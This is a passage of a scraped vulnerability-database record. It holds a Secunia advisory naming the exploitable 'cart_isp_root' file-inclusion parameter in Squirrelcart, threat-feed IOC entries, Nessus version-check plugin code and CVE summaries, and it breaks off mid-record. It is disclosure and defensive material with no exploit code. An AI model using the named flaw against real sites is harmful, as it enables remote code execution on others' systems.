DESCRIPTION:
OLiBekaS has reported a vulnerability in Squirrelcart, which can be
exploited by malicious people to compromise a vulnerable system.
Input passed to the "cart_isp_root" parameter in cart_content.php is
not properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.
The vulnerability has been reported in version 2.2.0. Other versions
may also be affected.
SOLUTION:
Edit the source code to ensure that input is properly verified.
PROVIDED AND/OR DISCOVERED BY:
OLiBekaS
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/1790
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
{"id": "SECURITYVULNS:DOC:12694", "bulletinFamily": "software", "title": "[SA20121] Squirrelcart "cart_isp_root" File Inclusion Vulnerability", "description": "\r\nTITLE:\r\nSquirrelcart "cart_isp_root" File Inclusion Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA20121\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/20121/\r\n\r\nCRITICAL:\r\nHighly critical\r\n\r\nIMPACT:\r\nSystem access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nSquirrelcart PHP Shopping Cart 2.x\r\nhttp://secunia.com/product/9957/\r\n\r\nDESCRIPTION:\r\nOLiBekaS has reported a vulnerability in Squirrelcart, which can be\r\nexploited by malicious people to compromise a vulnerable system.\r\n\r\nInput passed to the "cart_isp_root" parameter in cart_content.php is\r\nnot properly verified before being used to include files. This can be\r\nexploited to execute arbitrary PHP code by including files from local\r\nor external resources.\r\n\r\nThe vulnerability has been reported in version 2.2.0. Other versions\r\nmay also be affected.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly verified.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nOLiBekaS\r\n\r\nORIGINAL ADVISORY:\r\nhttp://milw0rm.com/exploits/1790\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "published": "2006-05-16T00:00:00", "modified": "2006-05-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12694", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:17", "edition": 1, "viewCount": 10, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2018-08-31T11:10:17", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2016-2075-1.NASL", "CISCO-SA-20191002-FTD-CMDINJ.NASL"]}, {"type": "cve", "idList": ["CVE-2014-2595", "CVE-2019-12694", "CVE-2016-3947", "CVE-2017-12694", "CVE-2015-9286", "CVE-2008-7273", "CVE-2018-12694", "CVE-2008-7272"]}, {"type": "cisco", "idList": ["CISCO-SA-20191002-FTD-CMDINJ"]}, {"type": "symantec", "idList": ["SMNTC-110329"]}, {"type": "zdi", "idList": ["ZDI-17-695"]}, {"type": "ics", "idList": ["ICSA-17-234-03"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:17", "rev": 2}, "vulnersScore": 8.4}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-09-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.209** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **39**.\n First seen: 2020-09-02T03:00:00, Last seen: 2020-09-18T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-02T00:00:00", "id": "RST:AAE8DBB6-D8F5-338A-A6BC-684C3971994D", "href": "", "published": "2020-10-09T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.209", "type": "rst", "cvss": {}}, {"lastseen": "2020-08-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.151** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-08-28T03:00:00, Last seen: 2020-08-28T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-28T00:00:00", "id": "RST:0D67F89F-A4AD-3E3C-A8FD-68EE61F6DFFD", "href": "", "published": "2020-10-08T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.151", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-29T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.188** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-09-29T03:00:00, Last seen: 2020-09-29T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-29T00:00:00", "id": "RST:4BDB89D5-900A-3F12-8414-FA7F524142D0", "href": "", "published": "2020-09-29T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.188", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-26T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.99.68** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **36**.\n First seen: 2020-08-29T03:00:00, Last seen: 2020-09-26T03:00:00.\n IOC tags: **malware**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\nIn according to RST Threat Feed the IP is related to **cfs5.tistory.com,t1.int.daumcdn.net** malicious domains.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-29T00:00:00", "id": "RST:7FFAAC0E-C838-3744-A27E-619936A58889", "href": "", "published": "2020-09-27T00:00:00", "title": "RST Threat feed. IOC: 211.231.99.68", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.204** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-09-18T03:00:00, Last seen: 2020-09-18T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-18T00:00:00", "id": "RST:A81AA3AB-A2D4-32E1-8721-7570DDFA213A", "href": "", "published": "2020-09-18T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.204", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]231.106.162** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-09-18T03:00:00, Last seen: 2020-09-18T03:00:00.\n IOC tags: **generic**.\nASN 38099: (First IP 211.231.97.0, Last IP 211.231.108.255).\nASN Name \"KAKAOASKR\" and Organisation \"Kakao Corp\".\nASN hosts 12694 domains.\nGEO IP information: City \"\", Country \"South Korea\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-18T00:00:00", "id": "RST:E428F64D-2E64-3518-A73D-8EC7FC0C440C", "href": "", "published": "2020-09-18T00:00:00", "title": "RST Threat feed. IOC: 211.231.106.162", "type": "rst", "cvss": {}}], "nessus": [{"lastseen": "2020-04-14T06:58:08", "description": "A command injection vulnerability exists in Cisco Firepower Threat Defense due to insufficient input validation. An\nauthenticated, local attacker can exploit this, via executing a specific CLI command that includes crafted arguments,\nto execute arbitrary commands.", "edition": 2, "cvss3": {"score": 6.7, "vector": "AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-10T00:00:00", "title": "Cisco Firepower Threat Defense Software Command Injection Vulnerability (cisco-sa-20191002-ftd-cmdinj)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12694"], "modified": "2020-04-10T00:00:00", "cpe": ["cpe:/o:cisco:firepower_threat_defense"], "id": "CISCO-SA-20191002-FTD-CMDINJ.NASL", "href": "https://www.tenable.com/plugins/nessus/135291", "sourceData": "#TRUSTED 4d399b40a47afa7fc73588f66a104baed216a29033cdc0d303f2e555cef3495e30d45f2f1ff2799e852c70dc07ae1596896f3f852e2d4f3ab3a2abf5706f91784bcf56962c21db2fbf44f022c9368ecf639053d1e60352dd05d798e2d912ebfba189ed9f49b0af0bdfa29fe98237cee9d1c7efeb7407f6b26dba4a0a849f41653bba5344bb4d1e36db25c22ac16c639c1e99c683f63c083757b0b003dc88ab80f9feac1290da2065027ce4e2da59dd94eb07aef5d690ce2cb2025b15c730487ff07aad29f48e00a3783d37292989006067f787ffd517ef34337e6473860fd441cc8bf5c6fd30c114db17fc85c7e202a0fbe3ca283c06bc19f661818dfae3925e43d0765c89eebcf82426bbdaa2168cb7528c779eb07e19aac38f3fe17544ace3d11e8791baf4f322284b46bd071010c6b217287e09aafb83d28a2b151934d6a3db19751e4efeef8b4ca66e67430472a2606a36609963e5ec48b4752ae8cf8b7fc8e3b4f9a4c099eba82304b1610150b4b5f86814ba0c4a69a469bf689c726a9c5a4b810aa85c8fd3456c60a150ec9ee79447c27c47c7708bc4fc61575b26c9dc171f32f4fb864e923c486423a561523a6c2dfbf4a2a727bba25acbec39a13bbd2d763c12acce1a340fe7b2a820c1556df0e3c14a9a2648b7b9df8c5c750f404a50c90eb51e1b5eb338a5705f8e21e962a8852bcb5b588884ed7a66601377da6b\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135291);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/13\");\n\n script_cve_id(\"CVE-2019-12694\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvo45799\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20191002-ftd-cmdinj\");\n script_xref(name:\"IAVA\", value:\"2019-A-0370\");\n\n script_name(english:\"Cisco Firepower Threat Defense Software Command Injection Vulnerability (cisco-sa-20191002-ftd-cmdinj)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A command injection vulnerability exists in Cisco Firepower Threat Defense due to insufficient input validation. An\nauthenticated, local attacker can exploit this, via executing a specific CLI command that includes crafted arguments,\nto execute arbitrary commands.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191002-ftd-cmdinj\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0a585265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo45799\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvo45799\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\", \"cisco_enumerate_firepower.nbin\", \"cisco_asa_firepower_version.nasl\");\n script_require_keys(\"installed_sw/Cisco Firepower Threat Defense\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Firepower Threat Defense');\n\nvuln_ranges = [\n {'min_ver' : '0.0', 'fix_ver' : '6.3.0.5'},\n {'min_ver' : '6.4', 'fix_ver' : '6.4.0.4'}\n];\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvo45799'\n);\n\ncisco::check_and_report(\n product_info:product_info,\n workarounds:workarounds,\n workaround_params:workaround_params,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:46:16", "description": "This update for ImageMagick fixes the following issues :\n\n - security update :\n\n - CVE-2016-6520: buffer overflow [bsc#991872]\n\n - CVE-2016-6491: Out-of-bounds read in CopyMagickMemory\n [bsc#991445]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:2075-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6491", "CVE-2016-6520"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:libMagickCore1"], "id": "SUSE_SU-2016-2075-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93290", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2075-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93290);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-6491\", \"CVE-2016-6520\");\n\n script_name(english:\"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:2075-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\n - security update :\n\n - CVE-2016-6520: buffer overflow [bsc#991872]\n\n - CVE-2016-6491: Out-of-bounds read in CopyMagickMemory\n [bsc#991445]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=991872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6491/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6520/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162075-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5fbfc865\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-ImageMagick-12694=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-ImageMagick-12694=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-ImageMagick-12694=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libMagickCore1-6.4.3.6-7.48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T21:41:41", "description": "A vulnerability in the command line interface (CLI) of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker with administrative privileges to execute commands on the underlying operating system with root privileges. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by executing a specific CLI command that includes crafted arguments. A successful exploit could allow the attacker to execute commands on the underlying OS with root privileges.", "edition": 12, "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-02T19:15:00", "title": "CVE-2019-12694", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12694"], "modified": "2019-10-10T16:57:00", "cpe": [], "id": "CVE-2019-12694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12694", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 